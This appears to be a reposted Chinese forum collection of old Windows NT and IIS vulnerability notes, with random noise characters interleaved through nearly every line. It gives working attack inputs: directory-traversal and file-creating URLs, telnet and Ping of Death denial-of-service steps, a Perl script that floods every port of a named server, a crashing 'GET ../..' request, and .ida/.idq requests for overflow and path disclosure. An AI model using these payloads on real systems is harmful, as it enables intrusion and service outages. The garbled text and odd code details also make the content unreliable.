受影响系统:4.0,iis 1.0: Y3 Q- Y3 N8 O `5 v4 m% b
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 D' }$ J- [3 `
. z% b6 L1 j$ X% f; k4 ~: q$ ]A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
$ Y. ^: o) f8 h+ g k: t
; m/ v: ~' t( i5 i! S1 M! eBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
8 m7 w" l) m+ ?' c, v9 n3 i
4 f$ ]5 F3 Y1 y4 @( }1 t( O" k--------------------------------------------------------------------
( i* M( |7 \/ d* i. }* }6 W$ J7 B. I5 e/ T, C! k$ b
受影响系统:4.0
: L, {; a. s( ` P# K, xA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
' q$ |! h& r i* M* n% I8 {8 [$ V+ U" c5 f4 S- r& e, l6 f
If the file 'target.bat' exists, the file will be truncated.$ i+ u* t7 Y: z3 ]3 |
4 W5 l4 d7 X$ U* J, S
! m Z W3 i" uA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
& `7 w5 G0 D- K5 b/ R( A
1 e4 Z; H" g" Q$ x" |/ `----------------------------------------------------------------------
1 ?7 f D/ T5 l* d- q. X4 o/ P% t D: A/ Z- n
受影响系统:3.51,4.0
! r3 H; D: E* c! o; ]) hMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.3 D' s a' J* H5 U* O
4 E; n4 I- y; d: Q2 p% E: t# GThe following steps;
; C& C; j3 v" W4 ?" o: [
2 N, c. k" p' e& s3 aTelnet to an NT 4.0 system on port 135 ' e, _; E* H8 y
Type about 10 characters followed by a <CR> . U* V+ X$ ? G9 j
Exit Telnet : s' M( z# Q8 A- m
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
* Y( \. R) y: e$ o) [( E W' X. y7 A
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.3 @' l) K, x4 ?% ~: @" G% x! }
, }4 t7 L, @. T* }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.: C: O+ \" G; t: W
! y, b$ T; |, l7 R
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.7 x5 W" L/ o% v0 g/ i9 n
3 S; h" U* G" A% l5 L M* T: GThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):) R+ I; L8 H3 t6 `
# w4 H1 u# v% H0 U
/*begin poke code*/
- ^, j+ Y7 d J# t9 Y5 e2 y5 ^5 g i8 H
use Socket;! Q( w0 v. h/ K7 J! L+ h
use FileHandle;, D5 ]4 T* J1 {
require "chat2.pl";
% W% u/ A6 S6 a1 C# U) y# J q
5 g# x1 {( [- k$systemname = $ARGV[0] && shift;3 p/ ^' L0 G0 U8 q
- }3 h, ~5 ]3 G% A
$verbose = 1; # tell me what you're hitting
; h" Z2 M, `& ]$knownports = 1; # don't hit known problem ports3 ~4 W6 @" A* y" f( I) k& l' F
for ($port = $0; $port<65535; $port++) 6 ^* D% ]; {( m6 s9 C
{0 T. V: l; h7 o1 a' ~- T
0 M. {8 s/ @; t$ G; A4 [; l6 C3 z% A: [2 E8 T
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
) q g. N) w3 T Q7 Q+ Nnext;! } x4 C& m) z5 F
}
! c& |+ v4 C0 Z; }$fh = chat::open_port($systemname, $port);/ ^: E. z/ M! ^
chat::print ($fh,"This is about ten characters or more");% l3 E' G) D1 `; |+ q
if ($verbose) {
. d% [3 @6 w0 |print "Trying port: $port\n";3 f. Q, f- n B! Q2 P5 s) U* U
}
* e: B3 H- D$ P9 I6 t( fchat::close($fh);. F S" h* j% g) K- v& ]
}* r' x8 C, P* r. m s}3 b* g- A' H. n4 I4 N' {* w% ?
$ Y( P! y1 _! z3 C% X1 `
E2 }. X, }# b5 ^8 A2 R1 e6 u$ D
/*end poke code*/
9 K8 g* G, M3 Y
, S! b; j) I. X: _Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
/ V1 S3 e: T/ d9 g% S( O9 ^, E$ O$ f+ H' J
--------------------------------------------------------------------------------
' }: u4 Q9 @ G1 G- s
5 d# O/ E! `, [1 L8 I6 o受影响系统:4.0$ B2 l% |5 O! I+ X# e2 F7 B
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
9 D9 E" |6 d# ]7 H" J* v9 _; `; E8 T* ?
This attack causes Dr. Watson to display an alert window and to log an error: 3 Y& m) E1 o6 b+ e: E
% O; |) d3 x" y3 W
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"% G* c+ H, }1 n4 J+ x {
- ~2 U/ I! `5 P- Y2 S7 l7 `& H8 H( ^) ~
--------------------------------------------------------------------------------; q' Y8 S# W+ J( R
& A) K% N1 B9 r* J8 `受影响系统:3.51,4.0
$ }+ C; c" t, S) |Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
. e% b2 W& D/ |9 C
, Z' w8 O8 ] tSTOP: 0X0000001E" e0 |. O1 x. e, _$ W7 y
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS: d- w. M" E8 h+ [5 H
5 I9 P$ z$ I- d
-OR-
. R. w6 [# w% @# I V0 X& D% d2 ~( o/ Q( W& l
STOP: 0x0000000A# c# ~4 e7 r( ^9 w, E3 h( E
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS' D, o$ \. R* }6 }% b2 w
8 U+ F' j- m' I
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.* o$ Z" C! `: o6 t o- @
1 j5 a: b: \$ C/ w* h, u( R--------------------------------------------------------------------------------
! ?: m) G! S; _4 i5 b4 S* L0 @6 u' I# z- D4 ~2 Y: s
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 6 d* u8 A% r: a& I/ o+ r0 l @
8 a! i( N$ r' L) J0 x0 x+ {. p
--------------------------------------------------------" \- b s; o( I5 D9 d, k5 _$ t w$ R9 S
" f3 G y+ v2 V5 j; H% MIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |